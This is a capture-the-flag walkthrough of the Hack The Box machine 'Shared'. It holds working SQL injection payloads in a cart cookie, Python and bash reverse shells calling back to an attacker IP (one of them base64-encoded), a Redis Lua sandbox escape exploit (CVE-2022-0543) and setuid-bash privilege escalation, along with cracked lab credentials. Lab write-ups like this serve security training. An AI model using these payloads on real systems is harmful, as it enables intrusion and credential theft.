# Shared - HTB

[[_TOC_]]

## Summary

<div align="center"><img width="560" height="424" src="images/0.png"></div>

Shared is a fun medium-rated HTB machine created by [Nauten](https://app.hackthebox.com/users/27582)

It starts with an amusing SQL injection with the cookie to leak credentials. We then get a shell as user `james_mason` because the credentials are reused on SSH.  
We can move laterally to the user `dan_smith` by exploiting an RCE vulnerability in IPython.  
After that, we were expected to capture the requests made by a `golang` binary. Then, we could manually decipher the RESP protocol in the captured packets to find `redis` password.  
Finally, we use the Redis Lua Sandbox Escape exploit (CVE-2022-0543) to get RCE as root.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.11.172
Nmap scan report for 10.10.11.172
Host is up (0.14s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https
```

```console
opcode@parrot$ nmap -sC -sV -p 22,80,443 -oN shared.nmap 10.10.11.172
Nmap scan report for 10.10.11.172
Host is up (0.12s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 91:e8:35:f4:69:5f:c2:e2:0e:27:46:e2:a6:b6:d8:65 (RSA)
|   256 cf:fc:c4:5d:84:fb:58:0b:be:2d:ad:35:40:9d:c3:51 (ECDSA)
|_  256 a3:38:6d:75:09:64:ed:70:cf:17:49:9a:dc:12:6d:11 (ED25519)
80/tcp  open  http     nginx 1.18.0
|_http-title: Did not follow redirect to http://shared.htb
|_http-server-header: nginx/1.18.0
443/tcp open  ssl/http nginx 1.18.0
| ssl-cert: Subject: commonName=*.shared.htb/organizationName=HTB/stateOrProvinceName=None/countryName=US
| Not valid before: 2022-03-20T13:37:14
|_Not valid after:  2042-03-15T13:37:14
|_ssl-date: TLS randomness does not represent time
|_http-title: Did not follow redirect to https://shared.htb
| tls-nextprotoneg: 
|   h2
|_  http/1.1
| tls-alpn: 
|   h2
|_  http/1.1
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

We have the standard SSH, HTTP and HTTPS ports open.  

Since it tries to redirect to http://shared.htb, we can add the domain to `/etc/hosts`:
```
10.10.11.172 shared.htb
```

Running `nmap` again also tells us about the 81 disallowed entries in `/robots.txt`

Visiting the website on port 80 redirects us to the https version:

![1](images/1.png)

The footer says it is running PrestaShop, an open-source e-commerce platform.  

If we run `ffuf`, we would find a bunch of stuff:
```console
opcode@parrot$ ffuf -c -w cybersec/wordlists/raft-small-words.txt -u 'https://shared.htb/FUZZ' -r -fs 56205-56220 -fc 403 2>/dev/null
api                     [Status: 401, Size: 16, Words: 2, Lines: 1, Duration: 1015ms]
Makefile                [Status: 200, Size: 88, Words: 4, Lines: 8, Duration: 137ms]
api-doc                 [Status: 401, Size: 16, Words: 2, Lines: 1, Duration: 1965ms]
apis                    [Status: 401, Size: 16, Words: 2, Lines: 1, Duration: 1683ms]
LICENSES                [Status: 200, Size: 186018, Words: 29493, Lines: 3303, Duration: 139ms]
api_test                [Status: 401, Size: 16, Words: 2, Lines: 1, Duration: 1715ms]
api2                    [Status: 401, Size: 16, Words: 2, Lines: 1, Duration: 2173ms]
api3                    [Status: 401, Size: 16, Words: 2, Lines: 1, Duration: 1925ms]
api4                    [Status: 401, Size: 16, Words: 2, Lines: 1, Duration: 1822ms]
apichain                [Status: 401, Size: 16, Words: 2, Lines: 1, Duration: 1786ms]
```

If we try to access `/api`, it informs us that the PrestaShop webservice is disabled.

Files like `LICENSES` and `Makefile` make me wonder if we can figure out the version of PrestaShop running.  
We can visit its GitHub page https://github.com/PrestaShop/PrestaShop and look for a file which could give us the version.  
Visiting https://shared.htb/INSTALL.txt, we can get some ideas. It says `1.7` in there, but it is still vague because if we look at past commits, we will find that it stayed `1.7` for all 1.7.x versions.  
There are a bunch of CVEs, but none of those worked for me.  

Since we have the domain name, we can look for subdomains with `gobuster`:
```console
opcode@parrot$ gobuster vhost -u https://shared.htb/ -w cybersec/wordlists/subdomains-top1million-110000.txt -k -q
Found: checkout.shared.htb (Status: 200) [Size: 3229]
```

We should also add `checkout.shared.htb` to `/etc/hosts`.  
If we had explored the website more, we could have found it without fuzzing. If we proceed to checkout after adding items to cart, it takes us to https://checkout.shared.htb/

![2](images/2.png)

## SQL injection with cookie

Running `ffuf` does not find anything here. This website does not have anything other than the cookie which keeps track of our cart.  
Playing around with it leads to the discovery of a SQL injection.

Initially, the cookie, when URL decoded, looked like this:
```
{"53GG2EF8":"1","SS5UMYLB":"1","5P6UG55R":"1"}
```
Changing the quantity does not cause any errors; they just get printed. But changing the product makes it print "Not found".  
Moreover, appending `' or 1=1-- -` gets rid of the "Not found" message.

Through hit and trial, we can find that number of columns is 3 as this payload does not print "Not found":
```
custom_cart={"53GG2EF8":"1","SS5UMYLB":"1","' union select 1,2,3-- -":"1"}
```
"2" is the one that gets displayed.

**Testing for LOAD_FILE**
```
custom_cart={"53GG2EF8":"1","SS5UMYLB":"1","' union select 1,load_file('/etc/passwd'),3-- -":"1"}
```
It didn't work

**Listing all databases**
```
custom_cart={"53GG2EF8":"1","SS5UMYLB":"1","' union select 1,group_concat(schema_name),3 from information_schema.schemata-- -":"1"}
```
We get `information_schema,checkout`

**Listing all tables in checkout**
```
custom_cart={"53GG2EF8":"1","SS5UMYLB":"1","' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='checkout'-- -":"1"}
```
We get `user,product`

**Listing all columns in user table**
```
custom_cart={"53GG2EF8":"1","SS5UMYLB":"1","' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='user'-- -":"1"}
```
We get `id,username,password`

**Listing all data in user table**
```
custom_cart={"53GG2EF8":"1","SS5UMYLB":"1","' union select 1,group_concat(id,':',username,':',password),3 from user-- -":"1"}
```
We get `1:james_mason:fc895d4eddc2fc12f995e18c865cf273`

The md5 hash cracks to `Soleil101`

## SSH as `james_mason`

We now have a valid set of credentials:
```
james_mason:Soleil101
```

We can use it for SSH.

After getting a shell, I expected PrestaShop to help with lateral movement.  
PrestaShop has this cool gimmick about its admin panel. During the install process, the name of the admin directory is changed from `/admin` to something like `/admin091anufki`  
For an attacker to even figure out the web route to the admin panel, having access to a shell is needed.  
Inside `/var/www/shared.htb/ps`, we have `admin337qgl3xc` on this box.

In `/var/www/checkout.shared.htb/config/db.php`, we can find mysql credentials:
```php
<?php
define('DBHOST','localhost');
define('DBUSER','checkout');
define('DBPWD','a54$K_M4?DdT^HUk');
define('DBNAME','checkout');
?>
```
But the `checkout` account does not have access to `prestashop` database, which should hold the password hash for admin panel.

I looked around for the `prestashop` password but couldn't find it. `linpeas.sh` couldn't find it either.

## Arbitrary code execution with IPython

```console
james_mason@shared:~$ id
uid=1000(james_mason) gid=1000(james_mason) groups=1000(james_mason),1001(developer)
```
The current user belongs to a group `developer`  
We can take a look at the files that this group has access to:
```console
james_mason@shared:~$ find / -group developer 2>/dev/null
/opt/scripts_review
```
It is an empty directory.

If we transfer `pspy` to the box, we will find an interesting cron job:
```
2022/07/30 14:04:01 CMD: UID=0    PID=71754  | /usr/sbin/CRON -f 
2022/07/30 14:04:01 CMD: UID=0    PID=71755  | /usr/sbin/CRON -f 
2022/07/30 14:04:01 CMD: UID=0    PID=71756  | /bin/sh -c /root/c.sh 
2022/07/30 14:04:01 CMD: UID=0    PID=71757  | /bin/bash /root/c.sh 
2022/07/30 14:04:01 CMD: UID=0    PID=71758  | /bin/bash /root/c.sh 

2022/07/30 14:04:01 CMD: UID=1001 PID=71759  | /bin/sh -c /usr/bin/pkill ipython; cd /opt/scripts_review/ && /usr/local/bin/ipython 
2022/07/30 14:04:01 CMD: UID=1001 PID=71760  | /usr/bin/pkill ipython 
2022/07/30 14:04:01 CMD: UID=1001 PID=71761  | /usr/bin/python3 /usr/local/bin/ipython 
2022/07/30 14:04:01 CMD: UID=0    PID=71762  | rm -rf /opt/scripts_review/* 

2022/07/30 14:04:06 CMD: UID=0    PID=71765  | /bin/bash /root/c.sh 
2022/07/30 14:04:06 CMD: UID=0    PID=71766  | /bin/bash /root/c.sh 
2022/07/30 14:04:06 CMD: UID=0    PID=71767  | pidof redis-server 
2022/07/30 14:04:06 CMD: UID=0    PID=71768  | perl -ne s/\((\d+)\)/print " $1"/ge 
```

First, a root cron job runs `/root/c.sh`, which runs `ipython` in `/opt/scripts_review` as UID 1001 (`dan_smith`)  
Then another `root` cronjob does something with `redis-server` and `perl`  
The current target seems to be `ipython`

I quickly found this advisory by googling around: https://github.com/advisories/GHSA-pq7m-3gw7-gq5x  
It is about an RCE that stems from IPython executing untrusted files in the current working directory every time it is invoked.

With this, we can get code execution:
```console
james_mason@shared:~$ mkdir -m 777 /opt/scripts_review/profile_default
james_mason@shared:~$ mkdir -m 777 /opt/scripts_review/profile_default/startup
james_mason@shared:~$ echo 'import sys,socket,os,pty;s=socket.socket();s.connect(("10.10.14.11",9001));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' > /opt/scripts_review/profile_default/startup/mal.py
```

After a while, we get a shell as `dan_smith`. To get a more stable shell, we can grab his `id_rsa`

```console
opcode@parrot$ chmod 600 id_rsa
opcode@parrot$ ssh -i id_rsa dan_smith@shared.htb
```

## Static and dynamic analysis of golang binary

```console
opcode@parrot$ dan_smith@shared:~$ id
uid=1001(dan_smith) gid=1002(dan_smith) groups=1002(dan_smith),1001(developer),1003(sysadmin)
```

We have yet another group: `sysadmin`. Let us look at the files owned by this group:
```console
dan_smith@shared:~$ find / -group sysadmin 2>/dev/null
/usr/local/bin/redis_connector_dev
```

```console
dan_smith@shared:~$ file /usr/local/bin/redis_connector_dev
/usr/local/bin/redis_connector_dev: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, Go BuildID=sdGIDsCGb51jonJ_67fq/_JkvEmzwH9g6f0vQYeDG/iH1iXHhyzaDZJ056wX9s/7UVi3T2i2LVCU8nXlHgr, not stripped
```
It is a `golang` binary

We can try to run it:
```console
dan_smith@shared:~$ redis_connector_dev
[+] Logging to redis instance using password...

INFO command result:
# Server
redis_version:6.0.15
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:4610f4c3acf7fb25
redis_mode:standalone
os:Linux 5.10.0-16-amd64 x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:10.2.1
process_id:8134
run_id:e32654fb29419603462abf06f3f6c7870f53021c
tcp_port:6379
uptime_in_seconds:50
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:7224992
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf
io_threads_active:0
 <nil>
```

We can transfer the binary to our system and take a look at its pseudocode in Ghidra.  
After the usual cleanup, this is what `main.main` looks like:
```go
void main.main(void)

{
  char **ppcVar1;
  long lVar2;
  long in_FS_OFFSET;
  char local_38 [16];
  char local_28 [16];
  char local_18 [16];
  
  lVar2 = os.Stdout;
  ppcVar1 = (char **)(*(long *)(in_FS_OFFSET + 0xfffffff8) + 0x10);
  if (*ppcVar1 <= local_38 + 8 && local_38 + 8 != *ppcVar1) {
    fmt.Fprintln();
    runtime.newobject();
    *(undefined8 *)(lVar2 + 24) = 0xe;
    *(char **)(lVar2 + 16) = s_localhost:6379_0067171e;
    *(undefined8 *)(lVar2 + 56) = 0x10;
    *(char **)(lVar2 + 48) = s_F2WHqJUz2WEz=GqqGC_scavenge_wait_00671c55;
    *(undefined8 *)(lVar2 + 64) = 0;
    github.com/go-redis/redis.NewClient();
    fmt.Fprintln();
    local_38 = CONCAT88(6,0x66f8d4);
    github.com/go-redis/redis.(*cmdable).Info();
    runtime.convTstring();
    fmt.Fprintln();
    return;
  }
  runtime.morestack_noctxt();
  main.main();
  return;
}
```

I've never reversed `golang` binary before, and I could not make sense of things here either.  
I tried `find_static_strings.py` and `find_dynamic_strings.py` from https://github.com/getCUJO/ThreatIntel/tree/master/Scripts/Ghidra but they didn't help much.  
I know that the string `localhost:6379` is hardcoded in there. Maybe it connects to a redis server locally. We noticed `redis-server` in `pspy` too.

If static analysis is difficult, we can try dynamic analysis.  
We can have the binary connect to a local `redis-server` instance and look at the packets in wireshark.

First, we need to install `redis`
```console
opcode@parrot$ curl -fsSL https://packages.redis.io/gpg | sudo gpg --dearmor -o /usr/share/keyrings/redis-archive-keyring.gpg
opcode@parrot$ echo "deb [signed-by=/usr/share/keyrings/redis-archive-keyring.gpg] https://packages.redis.io/deb bullseye main" | sudo tee /etc/apt/sources.list.d/redis.list
opcode@parrot$ sudo apt-get update
opcode@parrot$ sudo apt-get install redis
```

Now, we can start our own `redis-server`:
```console
opcode@parrot$ redis-server
```
It listens on port 6379 by default.

Now, we can use the binary:
```console
opcode@parrot$ ./redis_connector_dev 
[+] Logging to redis instance using password...

INFO command result:
 ERR AUTH <password> called without any password configured for the default user. Are you sure your configuration is correct?
```

But when I do it again with wireshark capturing from `loopback: lo`, the binary sends the following:
```
*2
$4
auth
$16
F2WHqJUz2WEz=Gqq
```

The RESP protocol for `redis` is very minimal and somewhat human readable: https://redis.io/docs/reference/protocol-spec/  
So we should be able to decipher the captured packets.  
In this case, the `*2` indicates that it is sending an array with 2 elements  
`$4` implies that the first element is a string with length 4 and it is `auth`, the `$16` means that the second element is a string with length 16 and it is `F2WHqJUz2WEz=Gqq`  
If we use the neat "Search" button to search for "auth", we will find https://redis.io/commands/auth/  
Hence we can guess that `F2WHqJUz2WEz=Gqq` is the redis password.

## Redis Lua Sandbox Escape (CVE-2022-0543)

We can get back to the box and attempt to connect to the redis server.  
Thankfully, `redis-cli` is available, and we won't have to work with RESP anymore.

```console
opcode@parrot$ redis-cli -a F2WHqJUz2WEz=Gqq
```
Running `info`, we can get the usual info, but `Keyspace` section is empty. It means that there is no data.

Also, note that `redis-server` is running as root:
```console
dan_smith@shared:~$ ps -eaf | grep redis
root       32832       1  2 10:26 ?        00:00:00 /usr/bin/redis-server 127.0.0.1:6379
```

So, I referred to this one https://0xdf.gitlab.io/2020/03/14/htb-postman.html#shell-as-redis and tried to place `id_rsa` in `/root/.ssh`. But it failed because the `/root/.ssh` directory does not exist.  
Next, I tried to write to `/var/spool/cron/crontabs/root`  
I set the DB directory:
```console
127.0.0.1:6379> config set dir /var/spool/cron/crontabs/
```
Then I got another SSH shell and ran:
```console
dan_smith@shared:~$ echo -e "\n\n*/1 * * * * /usr/bin/python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect(("10.10.14.12",9001));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'\n\n"|redis-cli -a F2WHqJUz2WEz=Gqq -x set ops
```
This one failed as well.

`redis` also has a cool **Master Slave Replication** exploit: https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf  
But only redis 4.x and 5.x are vulnerable, and on the box we have:
```console
dan_smith@shared:~$ redis-server --version
Redis server v=6.0.15 sha=00000000:0 malloc=jemalloc-5.2.1 bits=64 build=4610f4c3acf7fb25
```

Finally, I found a neat Lua Sandbox Escape exploit after googling: CVE-2022-0543  
Using it, I got a shell:
```console
dan_smith@shared:~$ redis-cli -a F2WHqJUz2WEz=Gqq
127.0.0.1:6379> eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjEyLzkwMDEgMD4mMQ== | base64 -d | bash", "r"); local res = f:read("*a"); f:close(); return res' 0
```

This is a root shell, but it dies within a minute.  
The usual ways to persist: placing `id_rsa` and `chmod u+s bash`, did not work here.

In `/etc/ssh/sshd_config`, we have:
```
PermitRootLogin no
```
`root` is not permitted to log in using SSH.

The `/tmp` directory for `root` is shared by other users.  
The `root` user is not allowed to create files outside of `/tmp` or `/root`, and we do not have `sudo` installed.

Instead, we can just modify the cron script to make bash a setuid binary:
```console
root@shared:~# echo -e "\nchmod u+s /bin/bash" >> /root/c.sh
```

And now, in the `dan_smith` shell, we can run bash with `-p` to not drop the effective user id:
```console
dan_smith@shared:~$ bash -p
bash-5.1# id
uid=1001(dan_smith) gid=1002(dan_smith) euid=0(root) groups=1002(dan_smith),1001(developer),1003(sysadmin)
```

Also, make sure to clean up the mess if you are not using a VIP+ instance:
```console
bash-5.1# chmod u-s /usr/bin/bash
bash-5.1# sed -i '$ d' /root/c.sh 
```
